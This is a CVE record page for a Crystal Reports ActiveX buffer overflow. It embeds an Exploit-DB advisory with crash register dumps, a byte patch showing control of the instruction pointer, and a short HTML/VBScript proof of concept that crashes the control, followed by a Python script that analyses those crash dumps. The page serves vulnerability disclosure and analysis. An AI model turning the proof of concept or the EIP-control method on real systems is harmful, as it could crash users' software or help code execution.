CVE-2008-0379: Details

CVE-2008-0379

Overflow
14% V4
Network
Published: 2008-01-22 18:00 +00:00
Last modified: 2017-09-28 10:57 +00:00

CVE Description

Race condition in the Enterprise Tree ActiveX control (EnterpriseControls.dll 11.5.0.313) in Crystal Reports XI Release 2 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via the SelectedSession method, which triggers a buffer overflow.

CVE Information

Related Weaknesses

CWE-ID    Weakness Name    Source

CWE-120   Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
          The product copies an input buffer to an output buffer without verifying that the size of the input buffer is less than the size of the output buffer, leading to a buffer overflow.

CWE-362   Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')
          The product contains a concurrent code sequence that requires temporary, exclusive access to a shared resource, but a timing window exists in which the shared resource can be modified by another code sequence operating concurrently.

Metrics

Metric   Score   Severity   CVSS Vector                     Source
V2       9.3     -          AV:N/AC:M/Au:N/C:C/I:C/A:C      nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood that a vulnerability will be exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVEs according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVEs. The percentile therefore serves to compare a CVE's EPSS score with those of other CVEs.

Exploit Information

Exploit Database EDB-ID: 4931

Publication date: 2008-01-16 23:00 +00:00
Author: shinnai
EDB Verified: Yes

#####################################################################################
Application:  Crystal Reports XI Release 2 (Enterprise Tree Control) Remote BoF/DoS
              www.businessobjects.com
Versions:     11
Platforms:    Windows XP Professional
Bug:          buffer-overflow
Exploitation: remote
Date:         2007-01-16
Author:       shinnai
e-mail:       shinnai[at]autistici[dot]org
web:          http://shinnai.altervista.org
#####################################################################################

1) Introduction
2) Technical details and bug
3) The Code
4) Fix

#####################################################################################

===============
1) Introduction
===============

This component is used to visualize on the web reports created with Crystal Reports.

#####################################################################################

============================
2) Technical details and bug
============================

Name:  EnterpriseControls.dll
Ver.:  11.5.0.313
CLSID: {3D58C9F3-7CA5-4C44-9D62-C5B63E059050}
MD5:   179e2dc7f9f6e9d6e0210e89c623fd72

Marked as:
RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller,data
IPStorage Safe: Safe for untrusted: caller,data

The problem is a buffer overflow which occurs when you use the "SelectedSession()" method.
It seems that, during the initialization of the component, a race condition occurs between
threads and 4 bytes of the same component will overwrite EIP. If you patch these 4 bytes,
you can control this register, using it to jump to a shellcode and execute arbitrary code
on the user's PC.

For exploiting this vulnerability you only need to create a web page containing the CLSID
and the codebase path to your crafted ActiveX.

These are the registers using the original file:

14:59:34.126 pid=1468 tid=1250 EXCEPTION (first-chance)
----------------------------------------------------------------
Exception C0000005 (ACCESS_VIOLATION reading [FF7DE928])
----------------------------------------------------------------
EAX=5A4472D4: 83 6C 24 04 28 E9 7D FF-FF FF 83 6C 24 04 2C E9
EBX=036B68CC: 44 C7 4D 5A 28 C7 4D 5A-00 C7 4D 5A D4 C6 4D 5A
ECX=5A4DC55C: D4 72 44 5A 65 6C 44 5A-6F 6C 44 5A E4 6F 44 5A
EDX=5A4DC55C: D4 72 44 5A 65 6C 44 5A-6F 6C 44 5A E4 6F 44 5A
ESP=01FCF3A8: B4 3B 43 5A 5C C5 4D 5A-C8 F7 44 5A 68 F4 FC 01
EBP=01FCF3D4: 5C F4 FC 01 77 01 45 5A-68 F4 FC 01 54 F7 07 03
ESI=5A4DE140: 79 3A 5C 66 72 61 6D 65-77 6F 72 6B 5F 73 64 6B
EDI=036B68F4: 5C C5 4D 5A 44 C5 4D 5A-01 00 00 00 30 C5 4D 5A
EIP=FF7DE928: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??   --> N/A
----------------------------------------------------------------

14:59:34.142 pid=1468 tid=1250 EXCEPTION (unhandled)
----------------------------------------------------------------
Exception C0000005 (ACCESS_VIOLATION reading [FF7DE928])
----------------------------------------------------------------
EAX=5A4472D4: 83 6C 24 04 28 E9 7D FF-FF FF 83 6C 24 04 2C E9
EBX=036B68CC: 44 C7 4D 5A 28 C7 4D 5A-00 C7 4D 5A D4 C6 4D 5A
ECX=5A4DC55C: D4 72 44 5A 65 6C 44 5A-6F 6C 44 5A E4 6F 44 5A
EDX=5A4DC55C: D4 72 44 5A 65 6C 44 5A-6F 6C 44 5A E4 6F 44 5A
ESP=01FCF3A8: B4 3B 43 5A 5C C5 4D 5A-C8 F7 44 5A 68 F4 FC 01
EBP=01FCF3D4: 5C F4 FC 01 77 01 45 5A-68 F4 FC 01 54 F7 07 03
ESI=5A4DE140: 79 3A 5C 66 72 61 6D 65-77 6F 72 6B 5F 73 64 6B
EDI=036B68F4: 5C C5 4D 5A 44 C5 4D 5A-01 00 00 00 30 C5 4D 5A
EIP=FF7DE928: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??   --> N/A
----------------------------------------------------------------

We'll find these 4 bytes at this address:

0x000172D8 "28 E9 7D FF"...

Using a hex editor to modify them to:

0x000172D8 "42 42 42 42"...

we'll have:

C:\Tools>bindiff /c /d EnterpriseControls_patched.dll EnterpriseControls_ori.dll
Different, Left is newer
4 bytes differ
================================================================================
000172D0 87 FF FF FF 83 6C 24 04 .....l$.    87 FF FF FF 83 6C 24 04 .....l$.
000172D8 <42 42 42 42>FF FF 83 6C BBBB...l   <28 E9 7D FF>FF FF 83 6C (.}....l
000172E0 24 04 2C E9 $.,.                    24 04 2C E9 $.,.
================================================================================
File Count Summary
Identical:      0 files
Near Identical: 0 files
Different:      1 files
Left Only:      0 files
Right Only:     0 files
Errors:         0 files
Total:          1 files
Byte Count Summary
Matched:    4 bytes differ
Left Only:  0 bytes
Right Only: 0 bytes
Total:      4 bytes

and the register values will be:

15:05:38.947 pid=12D4 tid=1240 EXCEPTION (first-chance)
----------------------------------------------------------------
Exception C0000005 (ACCESS_VIOLATION reading [42424242])
----------------------------------------------------------------
EAX=5A4472D4: 83 6C 24 04 42 42 42 42-FF FF 83 6C 24 04 2C E9
EBX=037368CC: 44 C7 4D 5A 28 C7 4D 5A-00 C7 4D 5A D4 C6 4D 5A
ECX=5A4DC55C: D4 72 44 5A 65 6C 44 5A-6F 6C 44 5A E4 6F 44 5A
EDX=5A4DC55C: D4 72 44 5A 65 6C 44 5A-6F 6C 44 5A E4 6F 44 5A
ESP=01FCF3CC: B4 3B 43 5A 5C C5 4D 5A-C8 F7 44 5A 8C F4 FC 01
EBP=01FCF3F8: 80 F4 FC 01 77 01 45 5A-8C F4 FC 01 CC 99 9D 02
ESI=5A4DE140: 79 3A 5C 66 72 61 6D 65-77 6F 72 6B 5F 73 64 6B
EDI=037368F4: 5C C5 4D 5A 44 C5 4D 5A-01 00 00 00 30 C5 4D 5A
EIP=42424242: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??   --> N/A
----------------------------------------------------------------

15:05:38.978 pid=12D4 tid=1240 EXCEPTION (unhandled)
----------------------------------------------------------------
Exception C0000005 (ACCESS_VIOLATION reading [42424242])
----------------------------------------------------------------
EAX=5A4472D4: 83 6C 24 04 42 42 42 42-FF FF 83 6C 24 04 2C E9
EBX=037368CC: 44 C7 4D 5A 28 C7 4D 5A-00 C7 4D 5A D4 C6 4D 5A
ECX=5A4DC55C: D4 72 44 5A 65 6C 44 5A-6F 6C 44 5A E4 6F 44 5A
EDX=5A4DC55C: D4 72 44 5A 65 6C 44 5A-6F 6C 44 5A E4 6F 44 5A
ESP=01FCF3CC: B4 3B 43 5A 5C C5 4D 5A-C8 F7 44 5A 8C F4 FC 01
EBP=01FCF3F8: 80 F4 FC 01 77 01 45 5A-8C F4 FC 01 CC 99 9D 02
ESI=5A4DE140: 79 3A 5C 66 72 61 6D 65-77 6F 72 6B 5F 73 64 6B
EDI=037368F4: 5C C5 4D 5A 44 C5 4D 5A-01 00 00 00 30 C5 4D 5A
EIP=42424242: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??   --> N/A
----------------------------------------------------------------

Isn't it fun? Naturally, the EIP overwrite requires that someone uses the crafted DLL;
otherwise you can just enjoy a crash of the application.

#####################################################################################

===========
3) The Code
===========

I will release a public exploit but, this time, no code execution ;-)
All I can say is that you can directly inject your shellcode into the DLL or pass an
argument to the "SelectedSession()" method and then jump to the shellcode.

PoC (DoS):

<html>
<object classid='clsid:3D58C9F3-7CA5-4C44-9D62-C5B63E059050' id='test'></object>
<script language = 'vbscript'>
test.SelectedSession = ""
</script>
</html>

#####################################################################################

======
4) Fix
======

No fix

#####################################################################################

# milw0rm.com [2008-01-17]
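The advisory's argument for EIP control rests on reading the two register dumps by eye: the dword at EAX+4 (28 E9 7D FF, little-endian 0xFF7DE928) is the faulting EIP, and after patching those four bytes to 42 42 42 42 the fault moves to 0x42424242. The following Python script is an added example, not part of the advisory or of the CVE record, that performs that triage mechanically: it parses dump lines of the exact shape shown above, finds every register whose 16 displayed bytes contain the EIP value as a little-endian dword, and checks that the access-violation address equals EIP (an instruction fetch from the controlled value rather than a stray data read). The only inputs are the two dumps copied from the advisory; nothing beyond the standard library is assumed.

```python
import re
import struct

# One register line of the dumps above, e.g.
#   EAX=5A4472D4: 83 6C 24 04 28 E9 7D FF-FF FF 83 6C 24 04 2C E9
# The bytes after the colon are the 16 bytes of memory the register points
# to; "??" means the debugger could not read that memory (as for EIP here).
REG_LINE = re.compile(r"^(?P<reg>E[A-Z]{2})=(?P<val>[0-9A-Fa-f]{8}):\s*(?P<mem>.*)$")
HEX_BYTE = re.compile(r"(?<![0-9A-Fa-f])[0-9A-Fa-f]{2}(?![0-9A-Fa-f])")
FAULT = re.compile(r"ACCESS_VIOLATION\s+(?P<kind>reading|writing)\s+\[(?P<addr>[0-9A-Fa-f]{8})\]")


def parse_dump(text):
    """Parse one crash dump into its fault (kind, address) and a register map
    of name -> (register value, bytes of memory shown beside it)."""
    regs = {}
    for raw in text.splitlines():
        m = REG_LINE.match(raw.strip())
        if m:
            mem = bytes(int(h, 16) for h in HEX_BYTE.findall(m.group("mem")))
            regs[m.group("reg")] = (int(m.group("val"), 16), mem)
    f = FAULT.search(text)
    fault = (f.group("kind"), int(f.group("addr"), 16)) if f else None
    return {"fault": fault, "regs": regs}


def find_eip_sources(dump):
    """Return [(register, offset, address)] for every place the faulting EIP
    value appears, as a little-endian dword, in the memory shown beside the
    other registers. A hit says which bytes EIP was loaded from."""
    eip = dump["regs"]["EIP"][0]
    needle = struct.pack("<I", eip)
    hits = []
    for reg, (val, mem) in dump["regs"].items():
        if reg == "EIP":
            continue
        i = mem.find(needle)
        while i != -1:
            hits.append((reg, i, val + i))
            i = mem.find(needle, i + 1)
    return hits


def analyze(text):
    """Summarise whether the crash is an instruction fetch from a value that
    can be traced to bytes in memory (EIP control), not just a bad pointer."""
    dump = parse_dump(text)
    eip = dump["regs"]["EIP"][0]
    fault = dump["fault"]
    return {
        "eip": eip,
        # A read fault whose address equals EIP is the CPU fetching an
        # instruction from the controlled value, not a bad data pointer.
        "fault_is_instruction_fetch": fault is not None and fault[0] == "reading" and fault[1] == eip,
        "sources": find_eip_sources(dump),
    }


# First-chance dump with the original EnterpriseControls.dll, copied from the advisory.
ORIGINAL_DUMP = """\
14:59:34.126 pid=1468 tid=1250 EXCEPTION (first-chance)
Exception C0000005 (ACCESS_VIOLATION reading [FF7DE928])
EAX=5A4472D4: 83 6C 24 04 28 E9 7D FF-FF FF 83 6C 24 04 2C E9
EBX=036B68CC: 44 C7 4D 5A 28 C7 4D 5A-00 C7 4D 5A D4 C6 4D 5A
ECX=5A4DC55C: D4 72 44 5A 65 6C 44 5A-6F 6C 44 5A E4 6F 44 5A
EDX=5A4DC55C: D4 72 44 5A 65 6C 44 5A-6F 6C 44 5A E4 6F 44 5A
ESP=01FCF3A8: B4 3B 43 5A 5C C5 4D 5A-C8 F7 44 5A 68 F4 FC 01
EBP=01FCF3D4: 5C F4 FC 01 77 01 45 5A-68 F4 FC 01 54 F7 07 03
ESI=5A4DE140: 79 3A 5C 66 72 61 6D 65-77 6F 72 6B 5F 73 64 6B
EDI=036B68F4: 5C C5 4D 5A 44 C5 4D 5A-01 00 00 00 30 C5 4D 5A
EIP=FF7DE928: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? --> N/A
"""

# First-chance dump with the 4 bytes at file offset 0x172D8 patched to 42 42 42 42.
PATCHED_DUMP = """\
15:05:38.947 pid=12D4 tid=1240 EXCEPTION (first-chance)
Exception C0000005 (ACCESS_VIOLATION reading [42424242])
EAX=5A4472D4: 83 6C 24 04 42 42 42 42-FF FF 83 6C 24 04 2C E9
EBX=037368CC: 44 C7 4D 5A 28 C7 4D 5A-00 C7 4D 5A D4 C6 4D 5A
ECX=5A4DC55C: D4 72 44 5A 65 6C 44 5A-6F 6C 44 5A E4 6F 44 5A
EDX=5A4DC55C: D4 72 44 5A 65 6C 44 5A-6F 6C 44 5A E4 6F 44 5A
ESP=01FCF3CC: B4 3B 43 5A 5C C5 4D 5A-C8 F7 44 5A 8C F4 FC 01
EBP=01FCF3F8: 80 F4 FC 01 77 01 45 5A-8C F4 FC 01 CC 99 9D 02
ESI=5A4DE140: 79 3A 5C 66 72 61 6D 65-77 6F 72 6B 5F 73 64 6B
EDI=037368F4: 5C C5 4D 5A 44 C5 4D 5A-01 00 00 00 30 C5 4D 5A
EIP=42424242: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? --> N/A
"""

if __name__ == "__main__":
    for label, text in (("original", ORIGINAL_DUMP), ("patched", PATCHED_DUMP)):
        r = analyze(text)
        print(f"{label}: EIP={r['eip']:08X} instruction-fetch fault={r['fault_is_instruction_fetch']}")
        for reg, off, addr in r["sources"]:
            print(f"  EIP value found at {reg}+{off} (address {addr:08X})")
```

For both dumps the script reports a single source, EAX+4 at in-memory address 0x5A4472D8, and an instruction-fetch fault at EIP, which is exactly what the bindiff output corroborates at file offset 0x000172D8. Note that the script works with in-memory addresses only; translating 0x5A4472D8 to a file offset requires the module's load base and section layout, which the advisory does not state, so that mapping is left to the reader's debugger.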

Products Mentioned

Configuration 0

Businessobjects >> Crystal_reports_xi >> Version r2

References

https://www.exploit-db.com/exploits/4931
Tags: exploit, x_refsource_EXPLOIT-DB
http://www.securityfocus.com/bid/27333
Tags: vdb-entry, x_refsource_BID
http://www.securitytracker.com/id?1019239
Tags: vdb-entry, x_refsource_SECTRACK